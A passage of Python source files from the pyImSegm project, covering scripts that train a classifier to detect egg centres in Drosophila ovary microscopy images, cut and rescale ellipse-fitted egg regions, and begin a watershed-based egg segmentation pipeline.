row_path[k] = tl_data.update_path(row_path[k])
assert os.path.exists(row_path[k]), 'missing %s' % row_path[k]
idx_name = get_idx_name(idx, row_path['path_image'])
img_struc, img_gene = tl_data.load_img_double_band_split(row_path['path_image'],
im_range=None)
# img_rgb = np.array(Image.open(row_path['path_img']))
img_rgb = tl_data.merge_image_channels(img_struc, img_gene)
if np.max(img_rgb) > 1:
img_rgb = img_rgb / float(np.max(img_rgb))
seg_ext = os.path.splitext(os.path.basename(row_path['path_segm']))[-1]
if seg_ext == '.npz':
with np.load(row_path['path_segm']) as npzfile:
segm = npzfile[npzfile.files[0]]
if dict_relabel is not None:
segm = seg_lbs.merge_probab_labeling_2d(segm, dict_relabel)
else:
segm = tl_data.io_imread(row_path['path_segm'])
if dict_relabel is not None:
segm = seg_lbs.relabel_by_dict(segm, dict_relabel)
if row_path['path_centers'] is not None \
and os.path.isfile(row_path['path_centers']):
ext = os.path.splitext(os.path.basename(row_path['path_centers']))[-1]
if ext == '.csv':
centers = tl_data.load_landmarks_csv(row_path['path_centers'])
centers = tl_data.swap_coord_x_y(centers)
elif ext == '.png':
centers = tl_data.io_imread(row_path['path_centers'])
# relabel loaded segm into relevant one
centers = np.array(LUT_ANNOT_CENTER_RELABEL)[centers]
else:
logging.warning('not supported file format %s', ext)
centers = None
else:
centers = None
if is_drawing(path_out):
export_visual_input_image_segm(path_out, idx_name, img_rgb, segm, centers)
return idx_name, img_rgb, segm, centers
def export_visual_input_image_segm(path_out, img_name, img, segm, centers=None):
""" visualise the input image and segmentation in common frame
:param str path_out: path to output directory
:param str img_name: image name
:param ndarray img: np.array
:param ndarray segm: np.array
:param centers: [(int, int)] or np.array
"""
fig = tl_visu.figure_image_segm_centres(img, segm, centers)
fig.savefig(os.path.join(path_out, img_name + '.png'),
bbox_inches='tight', pad_inches=0)
plt.close(fig)
def compute_min_dist_2_centers(centers, points):
""" compute distance toclosestt center and mark which center it is
:param [int, int] centers:
:param [int, int] points:
:return (float, int):
"""
dists = spatial.distance.cdist(np.array(points), np.array(centers),
metric='euclidean')
dist = np.min(dists, axis=1)
idx = np.argmin(dists, axis=1)
return dist, idx
def export_show_image_points_labels(path_out, img_name, img, seg, points,
labels=None, slic=None, seg_centers=None,
fig_suffix='', dict_label_marker=tl_visu.DICT_LABEL_MARKER):
""" export complete visualisation of labeld point over rgb image and segm
:param str path_out:
:param str img_name:
:param img: np.array
:param seg: np.array
:param [(int, int)] points:
:param [int] labels:
:param slic: np.array
:param seg_centers:
:param str fig_suffix:
:param dict_label_marker:
"""
points = np.array(points)
fig, axarr = plt.subplots(ncols=2, figsize=(9 * 2, 6))
img = img / float(np.max(img)) if np.max(img) > 1 else img
tl_visu.draw_image_segm_points(axarr[0], img, points, labels,
seg_contour=seg_centers,
lut_label_marker=dict_label_marker)
tl_visu.draw_image_segm_points(axarr[1], seg, points, labels, slic,
seg_contour=seg_centers,
lut_label_marker=dict_label_marker)
fig.tight_layout()
fig.savefig(os.path.join(path_out, img_name + fig_suffix + '.png'),
bbox_inches='tight', pad_inches=0)
plt.close(fig)
def estim_points_compute_features(name, img, segm, params):
""" determine points (center candidates) using slic
and for each compute feature vector with their names
:param str name:
:param ndarray img:
:param ndarray segm:
:param {str: any} params:
:return (str, ndarray, [(int, int)], [[float]], list(str)):
"""
# superpixels on image
assert img.shape[:2] == segm.shape[:2], \
'not matching shapes: %r : %r' % (img.shape, segm.shape)
slic = seg_spx.segment_slic_img2d(img, params['slic_size'], params['slic_regul'])
slic_centers = seg_spx.superpixel_centers(slic)
# slic_edges = seg_spx.make_graph_segm_connect_grid2d_conn4(slic)
features, feature_names = compute_points_features(segm, slic_centers,
params)
return name, slic, slic_centers, features, feature_names
def compute_points_features(segm, points, params):
""" for each point in segmentation compute relevant features according params
:param ndarray segm: segmentations
:param [(int, int)] points: positions in image
:param {str: any} params: parameters
:return ([[float]], list(str)): [[float] * nb_features] * nb_points, list(str) * nb_features
"""
features, feature_names = np.empty((len(points), 0)), list()
# segmentation histogram
if 'fts_hist_diams' in params and params['fts_hist_diams'] is not None:
features_hist, names_hist = seg_fts.compute_label_histograms_positions(
segm, points, diameters=params['fts_hist_diams'])
features = np.hstack((features, features_hist))
feature_names += names_hist
    names_ray = list()  # default empty; requires at least one computed Ray feature
# Ray features
if 'fts_ray_step' in params and params['fts_ray_step'] is not None:
list_features_ray = []
perform_closer = all((params.get('fts_ray_closer', False),
len(params['fts_ray_types']) > 1))
shifting = not perform_closer
for ray_edge, ray_border in params['fts_ray_types']:
features_ray, _, names_ray = seg_fts.compute_ray_features_positions(
segm, points, angle_step=params['fts_ray_step'], edge=ray_edge,
border_labels=ray_border, smooth_ray=params['fts_ray_smooth'],
shifting=shifting)
            # if "closer" is used, save all in a temporary array, else add to the feature space
if perform_closer:
list_features_ray.append(features_ray)
else:
features = np.hstack((features, features_ray))
feature_names += names_ray
# take the closest ray and then perform the shifting
if perform_closer:
features_ray = [seg_fts.shift_ray_features(ray)[0] for ray
in np.min(np.array(list_features_ray), axis=0)]
features = np.hstack((features, np.array(features_ray)))
feature_names += names_ray
return features, feature_names
def wrapper_estim_points_compute_features(name_img_segm, params):
name, img, segm = name_img_segm
return estim_points_compute_features(name, img, segm, params)
def label_close_points(centers, points, params):
""" label points whether they are close to center by distance to real center
or from annotation of close center regions
:param ndarray|[(int, int)] centers:
:param [(int, int)] points: positions in image
:param {str: any} params: parameters
:return [int]:
"""
if isinstance(centers, list):
min_dist, _ = compute_min_dist_2_centers(centers, points)
labels = (min_dist <= params['center_dist_thr'])
elif isinstance(centers, np.ndarray):
mx_points = np.array(points, dtype=int)
labels = centers[mx_points[:, 0], mx_points[:, 1]]
else:
logging.warning('not relevant centers info of type "%s"', type(centers))
labels = [-1] * len(points)
assert len(points) == len(labels), \
        'not equal lengths of points (%i) and labels (%i)' \
% (len(points), len(labels))
return labels
def wrapper_draw_export_slic_centers(args):
return export_show_image_points_labels(*args)
def dataset_load_images_segms_compute_features(params, df_paths, nb_workers=NB_WORKERS):
""" create whole dataset composed from loading input data, computing features
and label points by label whether its positive or negative center candidate
:param {str: any} params: parameters
:param DF df_paths: DataFrame
:param int nb_workers: parallel
:return dict:
"""
dict_imgs, dict_segms, dict_center = dict(), dict(), dict()
logging.info('loading input data (images, segmentation and centers)')
path_show_in = os.path.join(params['path_expt'], FOLDER_INPUT)
_wrapper_load = partial(load_image_segm_center, path_out=path_show_in,
dict_relabel=params['dict_relabel'])
iterate = tl_expt.WrapExecuteSequence(_wrapper_load, df_paths.iterrows(),
nb_workers=nb_workers,
desc='loading input data')
for name, img, seg, center in iterate:
dict_imgs[name] = img
dict_segms[name] = seg
dict_center[name] = center
dict_slics, dict_points, dict_features = dict(), dict(), dict()
logging.info('estimate candidate points and compute features')
gene_name_img_seg = ((name, dict_imgs[name], dict_segms[name])
for name in dict_imgs)
_wrapper_pnt_features = partial(wrapper_estim_points_compute_features,
params=params)
feature_names = None
iterate = tl_expt.WrapExecuteSequence(_wrapper_pnt_features,
gene_name_img_seg, nb_workers=nb_workers,
desc='estimate candidates & features')
for name, slic, points, features, feature_names in iterate:
dict_slics[name] = slic
dict_points[name] = points
dict_features[name] = features
logging.debug('computed features:\n %r', feature_names)
dict_labels = dict()
logging.info('assign labels according close distance to center')
path_points_train = os.path.join(params['path_expt'], FOLDER_POINTS_TRAIN)
tqdm_bar = tqdm.tqdm(total=len(dict_center), desc='labels assignment')
for name in dict_center:
dict_labels[name] = label_close_points(dict_center[name],
dict_points[name], params)
points = np.asarray(dict_points[name])[np.asarray(dict_labels[name]) == 1]
path_csv = os.path.join(path_points_train, name + '.csv')
tl_data.save_landmarks_csv(path_csv, points)
tqdm_bar.update()
tqdm_bar.close()
return (dict_imgs, dict_segms, dict_slics, dict_points, dict_center,
dict_features, dict_labels, feature_names)
def export_dataset_visual(path_output, dict_imgs, dict_segms, dict_slics,
dict_points, dict_labels, nb_workers=NB_WORKERS):
""" visualise complete training dataset by marking labeld points
over image and input segmentation
:param {str: ndarray} dict_imgs:
:param {str: ndarray} dict_segms:
:param {str: ndarray} dict_slics:
:param {str: ndarray} dict_points:
:param {str: ndarray} dict_labels:
:param int nb_workers: number processing in parallel
"""
logging.info('export training visualisations')
path_out = os.path.join(path_output, FOLDER_POINTS_TRAIN)
gener_args = ((path_out, name, dict_imgs[name], dict_segms[name],
dict_points[name], dict_labels[name], dict_slics[name],
None, '_train') for name in dict_imgs)
iterate = tl_expt.WrapExecuteSequence(wrapper_draw_export_slic_centers,
gener_args, nb_workers=nb_workers,
desc='exporting visualisations')
list(iterate)
def compute_statistic_centers(dict_stat, img, segm, center, slic, points, labels,
params, path_out=''):
""" compute statistic on centers
:param {str: float} dict_stat:
:param ndarray img:
:param ndarray segm:
:param center:
:param ndarray slic:
:param points:
:param labels:
:param dict params:
:param str path_out:
:return dict:
"""
labels_gt = label_close_points(center, points, params)
mask_valid = (labels_gt != -1)
points = np.asarray(points)[mask_valid, :].tolist()
labels = labels[mask_valid]
# proba = proba[mask_valid, :]
labels_gt = labels_gt[mask_valid].astype(int)
dict_stat.update(seg_clf.compute_classif_metrics(labels_gt, labels,
metric_averages=['binary']))
dict_stat['points all'] = len(labels)
dict_stat['points FP'] = np.sum(np.logical_and(labels == 1, labels_gt == 0))
dict_stat['points FN'] = np.sum(np.logical_and(labels == 0, labels_gt == 1))
# compute FP and FN to annotation
labels_fn_fp = labels.copy()
labels_fn_fp[np.logical_and(labels == 1, labels_gt == 0)] = -2
labels_fn_fp[np.logical_and(labels == 0, labels_gt == 1)] = -1
# visualise FP and FN to annotation
if os.path.isdir(path_out):
export_show_image_points_labels(path_out, dict_stat['image'], img, segm,
points, labels_fn_fp, slic, center,
'_FN-FP', tl_visu.DICT_LABEL_MARKER_FN_FP)
return dict_stat
def detect_center_candidates(name, image, segm, centers_gt, slic, points,
features, feature_names, params, path_out, classif):
""" for loaded or computer all necessary data, classify centers_gt candidates
and if we have annotation validate this results
:param str name:
:param ndarray image:
:param ndarray segm:
:param centers_gt:
:param slic: np.array
:param [(int, int)] points:
:param features:
:param list(str) feature_names:
:param dict params:
:param str path_out:
:param classif: obj
:return dict:
"""
labels = classif.predict(features)
# proba = classif.predict_proba(features)
candidates = np.asarray(points)[np.asarray(labels) == 1]
path_points = os.path.join(path_out, FOLDER_POINTS)
path_visu = os.path.join(path_out, FOLDER_POINTS_VISU)
path_csv = os.path.join(path_points, name + '.csv')
tl_data.save_landmarks_csv(path_csv, tl_data.swap_coord_x_y(candidates))
export_show_image_points_labels(path_visu, name, image, segm, points,
labels, slic, centers_gt)
dict_centers = {'image': name,
'path_points': path_csv}
if centers_gt is not None:
dict_centers = compute_statistic_centers(dict_centers, image, segm,
centers_gt, slic, points, labels,
params, path_visu)
return dict_centers
def wrapper_detect_center_candidates(data, params, path_output, classif):
name, img, segm, center, slic, points, features, feature_names = data
return detect_center_candidates(name, img, segm, center, slic, points,
features, feature_names, params,
path_output, classif)
def load_dump_data(path_dump_data):
""" loading saved data prom previous stages
:param path_dump_data:
:return dict:
"""
logging.info('loading dumped data "%s"', path_dump_data)
# with open(os.path.join(path_out, NAME_DUMP_TRAIN_DATA), 'r') as f:
# dict_data = pickle.load(f)
npz_file = np.load(path_dump_data, encoding='bytes')
dict_imgs = dict(npz_file['dict_images'].tolist())
dict_segms = dict(npz_file['dict_segms'].tolist())
dict_slics = dict(npz_file['dict_slics'].tolist())
dict_points = dict(npz_file['dict_points'].tolist())
dict_features = dict(npz_file['dict_features'].tolist())
dict_labels = dict(npz_file['dict_labels'].tolist())
dict_centers = dict(npz_file['dict_centers'].tolist())
feature_names = npz_file['feature_names'].tolist()
return (dict_imgs, dict_segms, dict_slics, dict_points, dict_centers,
dict_features, dict_labels, feature_names)
def save_dump_data(path_dump_data, imgs, segms, slics, points, centers,
features, labels, feature_names):
""" loading saved data prom previous stages """
logging.info('save (dump) data to "%s"', path_dump_data)
np.savez_compressed(path_dump_data, dict_images=imgs, dict_segms=segms,
dict_slics=slics, dict_points=points, dict_centers=centers,
dict_features=features, dict_labels=labels,
feature_names=feature_names, encoding='bytes')
def experiment_loo(classif, dict_imgs, dict_segms, dict_centers, dict_slics,
dict_points, dict_features, feature_names, params):
logging.info('run LOO prediction on training data...')
# test classif on images
gener_data = ((n, dict_imgs[n], dict_segms[n], dict_centers[n],
dict_slics[n], dict_points[n], dict_features[n],
feature_names) for n in dict_imgs)
_wrapper_detection = partial(wrapper_detect_center_candidates,
params=params, classif=classif,
path_output=params['path_expt'])
df_stat = pd.DataFrame()
iterate = tl_expt.WrapExecuteSequence(_wrapper_detection,
gener_data, nb_workers=params['nb_workers'],
desc='detect center candidates')
for dict_stat in iterate:
df_stat = df_stat.append(dict_stat, ignore_index=True)
df_stat.to_csv(os.path.join(params['path_expt'], NAME_CSV_STAT_TRAIN))
df_stat.set_index(['image'], inplace=True)
df_stat.to_csv(os.path.join(params['path_expt'], NAME_CSV_STAT_TRAIN))
logging.info('STATISTIC: \n %r', df_stat.describe().transpose())
def prepare_experiment_folder(params, dir_template):
params['path_expt'] = os.path.join(params['path_output'],
dir_template % params['name'])
if not os.path.exists(params['path_expt']):
assert os.path.isdir(os.path.dirname(params['path_expt'])), \
'missing: %s' % os.path.dirname(params['path_expt'])
logging.debug('creating missing folder: %s', params['path_expt'])
os.mkdir(params['path_expt'])
return params
def load_df_paths(params):
path_csv = os.path.join(params['path_expt'], NAME_CSV_TRIPLES)
if os.path.isfile(path_csv) and not FORCE_RELOAD:
logging.info('loading path pairs "%s"', path_csv)
df_paths = pd.read_csv(path_csv, encoding='utf-8', index_col=0)
else:
if os.path.isfile(params['path_list']):
df_paths = pd.read_csv(params['path_list'], index_col=0,
encoding='utf-8')
else:
df_paths = find_match_images_segms_centers(params['path_images'],
params['path_segms'],
params['path_centers'])
df_paths.to_csv(path_csv, encoding='utf-8')
df_paths.index = list(range(len(df_paths)))
return df_paths, path_csv
def main_train(params):
""" PIPELINE for training
0) load triplets or create triplets from path to images, annotations
1) load precomputed data or compute them now
2) train classifier with hyper-parameters
3) perform Leave-One-Out experiment
:param {str: any} params:
"""
params = prepare_experiment_folder(params, FOLDER_EXPERIMENT)
tl_expt.set_experiment_logger(params['path_expt'])
logging.info(tl_expt.string_dict(params, desc='PARAMETERS'))
tl_expt.save_config_yaml(os.path.join(params['path_expt'], NAME_YAML_PARAMS), params)
tl_expt.create_subfolders(params['path_expt'], LIST_SUBDIRS)
df_paths, _ = load_df_paths(params)
path_dump_data = os.path.join(params['path_expt'], NAME_DUMP_TRAIN_DATA)
if not os.path.isfile(path_dump_data) or FORCE_RECOMP_DATA:
(dict_imgs, dict_segms, dict_slics, dict_points, dict_centers,
dict_features, dict_labels, feature_names) = \
dataset_load_images_segms_compute_features(params, df_paths, params['nb_workers'])
assert len(dict_imgs) > 0, 'missing images'
save_dump_data(path_dump_data, dict_imgs, dict_segms, dict_slics, dict_points,
dict_centers, dict_features, dict_labels, feature_names)
else:
(dict_imgs, dict_segms, dict_slics, dict_points, dict_centers, dict_features,
dict_labels, feature_names) = load_dump_data(path_dump_data)
if is_drawing(params['path_expt']) and EXPORT_TRAINING_DATA:
export_dataset_visual(params['path_expt'], dict_imgs, dict_segms, dict_slics,
dict_points, dict_labels, params['nb_workers'])
# concentrate features, labels
features, labels, sizes = seg_clf.convert_set_features_labels_2_dataset(
dict_features, dict_labels, drop_labels=[-1], balance_type=params['balance'])
# remove all bad values from features space
features[np.isnan(features)] = 0
features[np.isinf(features)] = -1
assert np.sum(sizes) == len(labels), \
'not equal sizes (%d) and labels (%i)' \
% (int(np.sum(sizes)), len(labels))
# feature norm & train classification
nb_holdout = int(np.ceil(len(sizes) * CROSS_VAL_LEAVE_OUT_SEARCH))
cv = seg_clf.CrossValidateGroups(sizes, nb_holdout)
classif, params['path_classif'] = seg_clf.create_classif_search_train_export(
params['classif'], features, labels, cross_val=cv, params=params,
feature_names=feature_names, nb_search_iter=params['nb_classif_search'],
pca_coef=params.get('pca_coef', None), nb_workers=params['nb_workers'],
path_out=params['path_expt'])
nb_holdout = int(np.ceil(len(sizes) * CROSS_VAL_LEAVE_OUT_EVAL))
cv = seg_clf.CrossValidateGroups(sizes, nb_holdout)
seg_clf.eval_classif_cross_val_scores(params['classif'], classif, features, labels,
cross_val=cv, path_out=params['path_expt'])
seg_clf.eval_classif_cross_val_roc(params['classif'], classif, features, labels,
cross_val=cv, path_out=params['path_expt'])
if RUN_LEAVE_ONE_OUT:
experiment_loo(classif, dict_imgs, dict_segms, dict_centers, dict_slics,
dict_points, dict_features, feature_names, params)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
logging.info('run TRAINING...')
params = arg_parse_params(CENTER_PARAMS)
main_train(params)
logging.info('DONE')
```
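The positive/negative labelling used for training above reduces to thresholding the distance to the nearest annotated centre; below is a standalone sketch with made-up coordinates and the default 50 px threshold.
```python
import numpy as np
from scipy import spatial

# Made-up centres and candidate points; 50 px mirrors the default 'center_dist_thr'.
centers = [(100, 100), (300, 250)]
points = [(105, 98), (180, 180), (305, 260), (400, 10)]
center_dist_thr = 50

# Same computation as compute_min_dist_2_centers / label_close_points above.
dists = spatial.distance.cdist(np.array(points), np.array(centers), metric='euclidean')
min_dist = np.min(dists, axis=1)      # distance to the closest centre
closest = np.argmin(dists, axis=1)    # index of that centre
labels = (min_dist <= center_dist_thr).astype(int)

for pt, dst, idx, lb in zip(points, min_dist, closest, labels):
    print('point %s -> centre #%d at %.1f px, label %d' % (pt, idx, dst, lb))
```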
#### File: pyImSegm/experiments_ovary_detect/run_ellipse_cut_scale.py
```python
import os
import sys
import glob
import logging
from functools import partial
import pandas as pd
import numpy as np
from skimage import transform
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.utilities.experiments as tl_expt
import imsegm.ellipse_fitting as ell_fit
import run_ellipse_annot_match as r_match
COLUMNS_ELLIPSE = ['ellipse_xc', 'ellipse_yc',
'ellipse_a', 'ellipse_b',
'ellipse_theta']
OVERLAP_THRESHOLD = 0.45
NORM_FUNC = np.median # other options - mean, max, ...
NB_WORKERS = tl_expt.nb_workers(0.8)
PATH_IMAGES = tl_data.update_path(os.path.join('data_images', 'drosophila_ovary_slice'))
PATH_RESULTS = tl_data.update_path('results', absolute=True)
DEFAULT_PARAMS = {
'path_images': os.path.join(PATH_IMAGES, 'image', '*.jpg'),
'path_infofile': os.path.join(PATH_IMAGES, 'info_ovary_images_ellipses.csv'),
'path_output': os.path.join(PATH_RESULTS, 'cut_stages'),
}
def extract_ellipse_object(idx_row, path_images, path_out, norm_size):
""" cut the image selection according ellipse parameters
and scale it into given size to have all image in the end the same sizes
:param (int, row) idx_row: index and row with ellipse parameters
:param str path_images: path to the image folder
:param str path_out: path to output folder
:param (int, int) norm_size: output image size
"""
_, row = idx_row
# select image with this name and any extension
list_imgs = glob.glob(os.path.join(path_images, row['image_name'] + '.*'))
path_img = sorted(list_imgs)[0]
img, _ = tl_data.load_image_2d(path_img)
# create mask according to chosen ellipse
ell_params = row[COLUMNS_ELLIPSE].tolist()
mask = ell_fit.add_overlap_ellipse(np.zeros(img.shape[:2], dtype=int),
ell_params, 1)
# cut the particular image
img_cut = tl_data.cut_object(img, mask, 0, use_mask=True, bg_color=None)
# scaling according to the normal size
img_norm = transform.resize(img_cut, norm_size)
path_img = os.path.join(path_out, os.path.basename(path_img))
tl_data.export_image(path_img, img_norm)
def perform_stage(df_group, stage, path_images, path_out):
""" perform cutting images for a particular development stage
and nom them into common image size
:param df_group: input dataframe with ellipse parameters
:param int stage: index of development stage
:param str path_images: path to the image folder
:param str path_out: path to the output folder
"""
logging.info('stage %i listing %i items' % (stage, len(df_group)))
stat_a = NORM_FUNC(df_group['ellipse_a'])
stat_b = NORM_FUNC(df_group['ellipse_b'])
norm_size = (int(stat_b), int(stat_a))
logging.info('normal dimension is %r' % norm_size)
path_out_stage = os.path.join(path_out, str(stage))
if not os.path.isdir(path_out_stage):
os.mkdir(path_out_stage)
_wrapper_object = partial(extract_ellipse_object, path_images=path_images,
path_out=path_out_stage, norm_size=norm_size)
desc = 'stage %i - size %s' % (stage, norm_size)
    # NOTE: `params` is the module-level dict set in the __main__ block below
    iterate = tl_expt.WrapExecuteSequence(_wrapper_object, df_group.iterrows(),
                                          nb_workers=params['nb_workers'],
                                          desc=desc)
list(iterate)
def main(params):
""" PIPELINE for matching
:param {str: str} params:
"""
# tl_expt.set_experiment_logger(params['path_expt'])
# tl_expt.create_subfolders(params['path_expt'], LIST_SUBDIRS)
logging.info(tl_expt.string_dict(params, desc='PARAMETERS'))
if not os.path.isdir(params['path_output']):
os.mkdir(params['path_output'])
df_info = pd.read_csv(params['path_infofile'], index_col=0)
df_info = r_match.filter_table(df_info, params['path_images'])
df_info.dropna(inplace=True)
df_info = df_info[df_info['ellipse_Jaccard'] >= OVERLAP_THRESHOLD]
logging.info('filtered %i item in table' % len(df_info))
# execute over groups per stage
path_dir_imgs = os.path.dirname(params['path_images'])
for stage, df_stage in df_info.groupby('stage'):
perform_stage(df_stage, stage, path_dir_imgs, params['path_output'])
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('running...')
params = r_match.arg_parse_params(DEFAULT_PARAMS)
main(params)
logging.info('DONE')
```
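The core of `extract_ellipse_object` above is "mask the object, crop to its bounding box, resize to a common size"; the sketch below reproduces that with plain numpy/skimage (the random image, ellipse parameters and target size are assumptions; the script itself uses imsegm's `add_overlap_ellipse` and `cut_object`).
```python
import numpy as np
from skimage import draw, transform

# Illustrative inputs only.
rng = np.random.RandomState(0)
img = rng.rand(400, 600)

# Elliptical mask standing in for ell_fit.add_overlap_ellipse.
mask = np.zeros(img.shape, dtype=bool)
rr, cc = draw.ellipse(200, 300, 80, 120, shape=img.shape)
mask[rr, cc] = True

# Crop to the mask's bounding box with the background zeroed (cf. tl_data.cut_object).
rows, cols = np.nonzero(mask)
crop = np.where(mask, img, 0.)[rows.min():rows.max() + 1, cols.min():cols.max() + 1]

# Rescale every crop to a common "norm" size, as perform_stage does per stage.
norm_size = (96, 128)
img_norm = transform.resize(crop, norm_size)
print(crop.shape, '->', img_norm.shape)
```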
#### File: pyImSegm/experiments_ovary_detect/run_ovary_egg-segmentation.py
```python
import os
import sys
import time
import argparse
import logging
import pickle
from functools import partial
import matplotlib
if os.environ.get('DISPLAY', '') == '' and matplotlib.rcParams['backend'] != 'agg':
print('No display found. Using non-interactive Agg backend.')
matplotlib.use('Agg')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import ndimage
from skimage import segmentation, morphology
from skimage import measure, draw
# from sklearn.externals import joblib
# from sklearn import metrics, cross_validation
from skimage.measure.fit import EllipseModel
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.utilities.experiments as tl_expt
import imsegm.utilities.drawing as tl_visu
import imsegm.superpixels as seg_spx
import imsegm.region_growing as seg_rg
import imsegm.ellipse_fitting as ell_fit
from morphsnakes import morphsnakes, multi_snakes
# from libs import chanvese
NB_WORKERS = tl_expt.nb_workers(0.8)
NAME_EXPERIMENT = 'experiment_egg-segment'
TYPE_LOAD_IMAGE = '2d_struct'
DIR_VISUAL_POSIX = '___visu'
DIR_CENTRE_POSIX = '___centres'
DIR_DEBUG_POSIX = '___debug'
# setting default file names
NAME_FIG_LABEL_HISTO = 'fig_histo_annot_segments.png'
NAME_CSV_SEGM_STAT_SLIC_ANNOT = 'statistic_segm_slic_annot.csv'
NAME_CSV_SEGM_STAT_RESULT = 'statistic_segm_results.csv'
NAME_CSV_SEGM_STAT_RESULT_GC = 'statistic_segm_results_gc.csv'
EACH_UNIQUE_EXPERIMENT = False
INIT_MASK_BORDER = 50.
# minimal diameter for estimating ellipse
MIN_ELLIPSE_DAIM = 25.
# subfigure size for exporting images
MAX_FIGURE_SIZE = 14
# threshold: if two segmentations overlap more than this, keep just one of them
SEGM_OVERLAP = 0.5
# parameters for SLIC segmentation
SLIC_SIZE = 40
SLIC_REGUL = 0.3
# Region Growing configuration
DEBUG_EXPORT = False
RG2SP_THRESHOLDS = { # thresholds for updating between iterations
'centre': 20,
'shift': 10,
'volume': 0.05,
'centre_init': 50
}
COLUMNS_ELLIPSE = ('xc', 'yc', 'a', 'b', 'theta')
PATH_DATA = tl_data.update_path('data_images', absolute=True)
PATH_IMAGES = os.path.join(PATH_DATA, 'drosophila_ovary_slice')
# sample segmentation methods
LIST_SAMPLE_METHODS = (
'ellipse_moments', 'ellipse_ransac_mmt', 'ellipse_ransac_crit',
'GC_pixels-large', 'GC_pixels-shape', 'GC_slic-large', 'GC_slic-shape',
'rg2sp_greedy-mixture', 'rg2sp_GC-mixture',
'watershed_morph'
)
# default segmentation configuration
SEGM_PARAMS = {
    # ovary labels: background, follicular cells, nurse cells, cytoplasm
'tab-proba_ellipse': [0.01, 0.95, 0.95, 0.85],
'tab-proba_graphcut': [0.01, 0.6, 0.99, 0.75],
'tab-proba_RG2SP': [0.01, 0.6, 0.95, 0.75],
'path_single-model': os.path.join(PATH_DATA, 'RG2SP_eggs_single-model.pkl'),
'path_multi-models': os.path.join(PATH_DATA, 'RG2SP_eggs_mixture-model.pkl'),
'gc-pixel_regul': 3.,
'gc-slic_regul': 2.,
'RG2SP-shape': 5.,
'RG2SP-pairwise': 3.,
'RG2SP-swap': True,
'label_trans': [0.1, 0.03],
'overlap_theshold': SEGM_OVERLAP,
'RG2SP_theshold': RG2SP_THRESHOLDS,
'slic_size': SLIC_SIZE,
'slic_regul': SLIC_REGUL,
'path_list': os.path.join(PATH_IMAGES,
'list_imgs-segm-center-points_short.csv'),
'path_out': tl_data.update_path('results', absolute=True)
}
def arg_parse_params(params):
"""
SEE: https://docs.python.org/3/library/argparse.html
:return {str: str}:
"""
parser = argparse.ArgumentParser()
parser.add_argument('-list', '--path_list', type=str, required=False,
help='path to the list of image',
default=params['path_list'])
parser.add_argument('-out', '--path_out', type=str, required=False,
help='path to the output directory',
default=params['path_out'])
parser.add_argument('-n', '--name', type=str, required=False,
help='name of the experiment', default='ovary')
parser.add_argument('-cfg', '--path_config', type=str, required=False,
help='path to the configuration', default=None)
parser.add_argument('--nb_workers', type=int, required=False, default=NB_WORKERS,
help='number of processes in parallel')
parser.add_argument('-m', '--methods', type=str, required=False, nargs='+',
help='list of segment. methods', default=None)
arg_params = vars(parser.parse_args())
params.update(arg_params)
if not isinstance(arg_params['path_config'], str) \
or arg_params['path_config'].lower() == 'none':
params['path_config'] = ''
else:
params['path_config'] = tl_data.update_path(params['path_config'])
assert os.path.isfile(params['path_config']), \
'missing file: %s' % params['path_config']
ext = os.path.splitext(params['path_config'])[-1]
assert (ext == '.yaml' or ext == '.yml'), \
'"%s" should be YAML file' % os.path.basename(params['path_config'])
data = tl_expt.load_config_yaml(params['path_config'])
params.update(data)
params.update(arg_params)
for k in (k for k in arg_params if 'path' in k):
if not arg_params[k]:
continue
params[k] = tl_data.update_path(arg_params[k], absolute=True)
assert os.path.exists(params[k]), 'missing: %s' % params[k]
# load saved configuration
logging.info('ARG PARAMETERS: \n %r', params)
return params
def load_image(path_img, img_type=TYPE_LOAD_IMAGE):
""" load image from given path according specification
:param str path_img:
:param str img_type:
:return ndarray:
"""
path_img = os.path.abspath(os.path.expanduser(path_img))
assert os.path.isfile(path_img), 'missing: "%s"' % path_img
if img_type == 'segm':
img = tl_data.io_imread(path_img)
elif img_type == '2d_struct':
img, _ = tl_data.load_img_double_band_split(path_img)
        assert img.ndim == 2, 'image must be a single-channel (2D) array'
else:
logging.error('not supported loading img_type: %s', img_type)
img = tl_data.io_imread(path_img)
logging.debug('image shape: %r, value range %f - %f', img.shape,
img.min(), img.max())
return img
def path_out_img(params, dir_name, name):
return os.path.join(params['path_exp'], dir_name, name + '.png')
def export_draw_image_segm(path_fig, img, segm=None, segm_obj=None, centers=None):
""" draw and export visualisation of image and segmentation
:param str path_fig: path to the exported figure
:param ndarray img:
:param ndarray segm:
:param ndarray segm_obj:
:param ndarray centers:
"""
size = np.array(img.shape[:2][::-1], dtype=float)
fig, ax = plt.subplots(figsize=(size / size.max() * MAX_FIGURE_SIZE))
ax.imshow(img, alpha=1., cmap=plt.cm.Greys)
if segm is not None:
ax.contour(segm)
if segm_obj is not None:
ax.imshow(segm_obj, alpha=0.1)
assert len(np.unique(segm_obj)) < 1e2, \
'too many labeled objects - %i' % len(np.unique(segm_obj))
ax.contour(segm_obj, levels=np.unique(segm_obj).tolist(),
cmap=plt.cm.jet_r, linewidths=(10, ))
if centers is not None:
ax.plot(np.array(centers)[:, 1], np.array(centers)[:, 0], 'o', color='r')
fig = tl_visu.figure_image_adjustment(fig, img.shape)
fig.savefig(path_fig)
plt.close(fig)
def segment_watershed(seg, centers, post_morph=False):
""" perform watershed segmentation on input imsegm
and optionally run some postprocessing using morphological operations
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param bool post_morph: apply morphological postprocessing
:return ndarray, [[int, int]]: resulting segmentation, updated centres
"""
logging.debug('segment: watershed...')
seg_binary = (seg > 0)
seg_binary = ndimage.morphology.binary_fill_holes(seg_binary)
# thr_area = int(0.05 * np.sum(seg_binary))
# seg_binary = morphology.remove_small_holes(seg_binary, min_size=thr_area)
distance = ndimage.distance_transform_edt(seg_binary)
markers = np.zeros_like(seg)
for i, pos in enumerate(centers):
markers[int(pos[0]), int(pos[1])] = i + 1
segm = morphology.watershed(-distance, markers, mask=seg_binary)
# if morphological postprocessing was not selected, ends here
if not post_morph:
return segm, centers, None
segm_clean = np.zeros_like(segm)
for lb in range(1, np.max(segm) + 1):
seg_lb = (segm == lb)
